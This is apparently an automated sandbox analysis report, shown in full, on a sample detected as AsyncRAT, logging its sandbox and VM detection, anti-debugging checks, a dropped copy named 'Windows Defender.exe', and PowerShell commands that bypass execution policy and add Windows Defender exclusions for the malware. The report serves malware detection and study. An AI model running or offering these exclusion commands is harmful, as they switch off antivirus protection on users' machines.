Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: owuP726k3d.exe, Windows Defender.exe.0.dr	Binary or memory string: SBIEDLL.DLLINFO

Source: C:\Users\user\Desktop\owuP726k3d.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Memory allocated: 1AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Memory allocated: 1830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Memory allocated: 1B240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Memory allocated: 1A730000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\owuP726k3d.exe	Window / User API: threadDelayed 1785	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Window / User API: threadDelayed 8011	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6313	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3442	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7556	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2126	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6098	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3589	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2283
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7310

Source: C:\Users\user\Desktop\owuP726k3d.exe TID: 2232	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe TID: 2232	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe TID: 2232	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924	Thread sleep count: 7556 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944	Thread sleep count: 2126 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4692	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008	Thread sleep count: 6098 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008	Thread sleep count: 3589 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe TID: 1736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe TID: 6792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\owuP726k3d.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\owuP726k3d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Thread delayed: delay time: 922337203685477

Source: Windows Defender.exe.0.dr	Binary or memory string: vmware
Source: owuP726k3d.exe, 00000000.00000002.2735847432.000000001B952000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllelb

Source: C:\Users\user\Desktop\owuP726k3d.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\owuP726k3d.exe

Code function: 0_2_00007FFB4AD17063 CheckRemoteDebuggerPresent,

0_2_00007FFB4AD17063

Source: C:\Users\user\Desktop\owuP726k3d.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\owuP726k3d.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\owuP726k3d.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\owuP726k3d.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'

Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'owuP726k3d.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'	Jump to behavior

Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Source: C:\Users\user\Desktop\owuP726k3d.exe	Queries volume information: C:\Users\user\Desktop\owuP726k3d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
